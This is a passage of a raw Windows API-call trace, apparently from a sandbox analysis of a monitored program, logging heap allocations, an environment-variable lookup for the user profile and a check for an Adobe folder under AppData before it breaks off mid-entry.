0x2a72628 [0152.987] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.987] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68430 | out: hHeap=0x2af0000) returned 1 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a68430 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0152.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0152.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0152.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0152.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0152.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0152.989] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0152.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0152.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0152.990] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0152.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0152.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0152.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0152.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0152.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0152.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0152.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0152.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0152.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0152.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0152.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0152.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0152.992] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0152.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0152.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0152.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0152.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0152.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0152.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0152.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0152.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0152.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0152.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0152.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0152.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0152.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0152.994] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Adobe", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 0x9e2278 [0152.994] FindClose (in: hFindFile=0x9e2278 | out: hFindFile=0x9e2278) returned 1 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.994] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0152.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0152.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0152.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0152.995] RtlAllocateHeap 